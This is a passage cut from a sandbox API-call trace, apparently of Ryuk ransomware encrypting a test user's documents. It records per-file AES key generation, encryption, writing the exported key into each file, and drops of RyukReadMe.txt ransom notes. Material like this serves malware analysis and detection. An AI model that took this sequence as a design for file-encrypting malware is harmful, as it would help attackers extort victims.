halpmcxz\\documents\\jmlszne72flmiagkg.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0155.336] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acfe8 | out: lpFileSize=0x29acfe8*=98780) returned 1 [0155.336] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acff8 | out: lpFileSize=0x29acff8*=98780) returned 1 [0155.336] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x180ba, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0155.336] ReadFile (in: hFile=0x188, lpBuffer=0x29ad048, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ad008, lpOverlapped=0x0 | out: lpBuffer=0x29ad048*, lpNumberOfBytesRead=0x29ad008*=0x19, lpOverlapped=0x0) returned 1 [0155.337] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0155.337] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29acfd0 | out: phKey=0x29acfd0*=0x3b8690) returned 1 [0155.337] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0155.337] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0155.337] ReadFile (in: hFile=0x188, lpBuffer=0x2760000, nNumberOfBytesToRead=0x181dc, lpNumberOfBytesRead=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29acfe0*=0x181dc, lpOverlapped=0x0) returned 1 [0155.339] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4250) returned 1 [0155.339] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29acfd8*=0x181dc, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29acfd8*=0x181e0) returned 1 [0155.339] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0155.339] WriteFile (in: hFile=0x188, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x181e0, lpNumberOfBytesWritten=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29acfe0*=0x181e0, lpOverlapped=0x0) returned 1 [0155.340] WriteFile (in: hFile=0x188, lpBuffer=0x29ad020*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad020*, lpNumberOfBytesWritten=0x29acfe4*=0x6, lpOverlapped=0x0) returned 1 [0155.340] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29acff0 | out: pbData=0x0*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0155.340] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ad070, pdwDataLen=0x29acff0 | out: pbData=0x29ad070*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0155.340] WriteFile (in: hFile=0x188, lpBuffer=0x29ad070*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad070*, lpNumberOfBytesWritten=0x29acfe4*=0x10c, lpOverlapped=0x0) returned 1 [0155.353] CloseHandle (hObject=0x188) returned 1 [0155.368] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0155.372] CryptDestroyKey (hKey=0x3b8690) returned 1 [0155.372] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0155.372] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0155.372] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0155.373] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jmy07fEtkxxlI33HZ5tJ.docx", dwFileAttributes=0x80) returned 1 [0155.373] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jmy07fEtkxxlI33HZ5tJ.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jmy07fetkxxli33hz5tj.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0155.373] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acfe8 | out: lpFileSize=0x29acfe8*=32705) returned 1 [0155.373] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acff8 | out: lpFileSize=0x29acff8*=32705) returned 1 [0155.373] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x7e9f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0155.373] ReadFile (in: hFile=0x188, lpBuffer=0x29ad048, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ad008, lpOverlapped=0x0 | out: lpBuffer=0x29ad048*, lpNumberOfBytesRead=0x29ad008*=0x19, lpOverlapped=0x0) returned 1 [0155.374] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0155.374] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29acfd0 | out: phKey=0x29acfd0*=0x3b8690) returned 1 [0155.374] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0155.374] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0155.374] ReadFile (in: hFile=0x188, lpBuffer=0x2760000, nNumberOfBytesToRead=0x7fc1, lpNumberOfBytesRead=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29acfe0*=0x7fc1, lpOverlapped=0x0) returned 1 [0155.375] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4250) returned 1 [0155.375] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29acfd8*=0x7fc1, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29acfd8*=0x7fd0) returned 1 [0155.375] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0155.375] WriteFile (in: hFile=0x188, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x7fd0, lpNumberOfBytesWritten=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29acfe0*=0x7fd0, lpOverlapped=0x0) returned 1 [0155.375] WriteFile (in: hFile=0x188, lpBuffer=0x29ad020*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad020*, lpNumberOfBytesWritten=0x29acfe4*=0x6, lpOverlapped=0x0) returned 1 [0155.375] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29acff0 | out: pbData=0x0*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0155.375] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ad070, pdwDataLen=0x29acff0 | out: pbData=0x29ad070*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0155.375] WriteFile (in: hFile=0x188, lpBuffer=0x29ad070*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad070*, lpNumberOfBytesWritten=0x29acfe4*=0x10c, lpOverlapped=0x0) returned 1 [0155.375] CloseHandle (hObject=0x188) returned 1 [0155.408] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0155.412] CryptDestroyKey (hKey=0x3b8690) returned 1 [0155.412] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0155.412] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0155.412] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0155.413] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\liWJIW7o.pptx", dwFileAttributes=0x80) returned 1 [0155.421] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\liWJIW7o.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\liwjiw7o.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0155.421] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acfe8 | out: lpFileSize=0x29acfe8*=94980) returned 1 [0155.421] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acff8 | out: lpFileSize=0x29acff8*=94980) returned 1 [0155.421] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x171e2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0155.421] ReadFile (in: hFile=0x188, lpBuffer=0x29ad048, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ad008, lpOverlapped=0x0 | out: lpBuffer=0x29ad048*, lpNumberOfBytesRead=0x29ad008*=0x19, lpOverlapped=0x0) returned 1 [0155.422] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0155.422] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29acfd0 | out: phKey=0x29acfd0*=0x3b8690) returned 1 [0155.422] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0155.423] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0155.423] ReadFile (in: hFile=0x188, lpBuffer=0x2760000, nNumberOfBytesToRead=0x17304, lpNumberOfBytesRead=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29acfe0*=0x17304, lpOverlapped=0x0) returned 1 [0155.424] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4250) returned 1 [0155.424] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29acfd8*=0x17304, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29acfd8*=0x17310) returned 1 [0155.425] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0155.425] WriteFile (in: hFile=0x188, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x17310, lpNumberOfBytesWritten=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29acfe0*=0x17310, lpOverlapped=0x0) returned 1 [0155.425] WriteFile (in: hFile=0x188, lpBuffer=0x29ad020*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad020*, lpNumberOfBytesWritten=0x29acfe4*=0x6, lpOverlapped=0x0) returned 1 [0155.425] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29acff0 | out: pbData=0x0*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0155.425] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ad070, pdwDataLen=0x29acff0 | out: pbData=0x29ad070*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0155.425] WriteFile (in: hFile=0x188, lpBuffer=0x29ad070*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad070*, lpNumberOfBytesWritten=0x29acfe4*=0x10c, lpOverlapped=0x0) returned 1 [0155.425] CloseHandle (hObject=0x188) returned 1 [0155.467] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0155.471] CryptDestroyKey (hKey=0x3b8690) returned 1 [0155.471] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0155.471] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0155.471] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0155.471] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\MsX6aDajJTGVlbgUqnn.docx", dwFileAttributes=0x80) returned 1 [0155.471] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\MsX6aDajJTGVlbgUqnn.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\msx6adajjtgvlbguqnn.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0155.472] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acfe8 | out: lpFileSize=0x29acfe8*=67011) returned 1 [0155.472] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acff8 | out: lpFileSize=0x29acff8*=67011) returned 1 [0155.472] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x104a1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0155.472] ReadFile (in: hFile=0x188, lpBuffer=0x29ad048, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ad008, lpOverlapped=0x0 | out: lpBuffer=0x29ad048*, lpNumberOfBytesRead=0x29ad008*=0x19, lpOverlapped=0x0) returned 1 [0155.472] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0155.472] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29acfd0 | out: phKey=0x29acfd0*=0x3b8690) returned 1 [0155.472] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0155.473] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0155.473] ReadFile (in: hFile=0x188, lpBuffer=0x2760000, nNumberOfBytesToRead=0x105c3, lpNumberOfBytesRead=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29acfe0*=0x105c3, lpOverlapped=0x0) returned 1 [0155.474] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4250) returned 1 [0155.474] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29acfd8*=0x105c3, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29acfd8*=0x105d0) returned 1 [0155.474] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0155.474] WriteFile (in: hFile=0x188, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x105d0, lpNumberOfBytesWritten=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29acfe0*=0x105d0, lpOverlapped=0x0) returned 1 [0155.474] WriteFile (in: hFile=0x188, lpBuffer=0x29ad020*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad020*, lpNumberOfBytesWritten=0x29acfe4*=0x6, lpOverlapped=0x0) returned 1 [0155.474] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29acff0 | out: pbData=0x0*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0155.474] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ad070, pdwDataLen=0x29acff0 | out: pbData=0x29ad070*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0155.474] WriteFile (in: hFile=0x188, lpBuffer=0x29ad070*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad070*, lpNumberOfBytesWritten=0x29acfe4*=0x10c, lpOverlapped=0x0) returned 1 [0155.474] CloseHandle (hObject=0x188) returned 1 [0155.489] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0155.493] CryptDestroyKey (hKey=0x3b8690) returned 1 [0155.493] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0155.493] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0155.493] SetLastError (dwErrCode=0x0) [0155.493] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0155.493] GetLastError () returned 0xb7 [0155.493] CloseHandle (hObject=0x188) returned 1 [0155.493] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0xffffffffffffffff [0155.493] FindClose (in: hFindFile=0xffffffffffffffff | out: hFindFile=0xffffffffffffffff) returned 0 [0155.493] SetLastError (dwErrCode=0x0) [0155.493] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my music\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0155.589] GetLastError () returned 0x0 [0155.589] WriteFile (in: hFile=0x188, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ad1f0*=0x320, lpOverlapped=0x0) returned 1 [0155.590] CloseHandle (hObject=0x188) returned 1 [0155.590] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0155.590] SetLastError (dwErrCode=0x0) [0155.590] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0155.590] GetLastError () returned 0xb7 [0155.590] CloseHandle (hObject=0x188) returned 1 [0155.590] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0xffffffffffffffff [0155.590] FindClose (in: hFindFile=0xffffffffffffffff | out: hFindFile=0xffffffffffffffff) returned 0 [0155.590] SetLastError (dwErrCode=0x0) [0155.590] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my pictures\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0155.590] GetLastError () returned 0x0 [0155.590] WriteFile (in: hFile=0x188, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ad1f0*=0x320, lpOverlapped=0x0) returned 1 [0155.591] CloseHandle (hObject=0x188) returned 1 [0155.591] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0155.591] SetLastError (dwErrCode=0x0) [0155.591] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0155.591] GetLastError () returned 0xb7 [0155.591] CloseHandle (hObject=0x188) returned 1 [0155.591] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0155.594] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0155.594] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0155.594] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0155.594] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0155.594] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss", dwFileAttributes=0x80) returned 1 [0155.595] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\favorites.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0155.595] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=0) returned 1 [0155.595] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=0) returned 1 [0155.595] CloseHandle (hObject=0x18c) returned 1 [0155.595] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0155.595] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0155.595] SetLastError (dwErrCode=0x0) [0155.595] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0155.752] GetLastError () returned 0x0 [0155.752] WriteFile (in: hFile=0x18c, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29aca40*=0x320, lpOverlapped=0x0) returned 1 [0155.754] CloseHandle (hObject=0x18c) returned 1 [0155.754] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0155.754] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0155.754] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0155.754] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0155.755] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico", dwFileAttributes=0x80) returned 1 [0155.756] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\folder.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0155.756] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac088 | out: lpFileSize=0x29ac088*=29926) returned 1 [0155.756] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac098 | out: lpFileSize=0x29ac098*=29926) returned 1 [0155.756] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x73c4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0155.756] ReadFile (in: hFile=0x190, lpBuffer=0x29ac0e8, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac0a8, lpOverlapped=0x0 | out: lpBuffer=0x29ac0e8*, lpNumberOfBytesRead=0x29ac0a8*=0x19, lpOverlapped=0x0) returned 1 [0155.758] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0155.758] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac070 | out: phKey=0x29ac070*=0x3b8690) returned 1 [0155.758] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0155.758] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0155.758] ReadFile (in: hFile=0x190, lpBuffer=0x2760000, nNumberOfBytesToRead=0x74e6, lpNumberOfBytesRead=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac080*=0x74e6, lpOverlapped=0x0) returned 1 [0155.759] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4240, 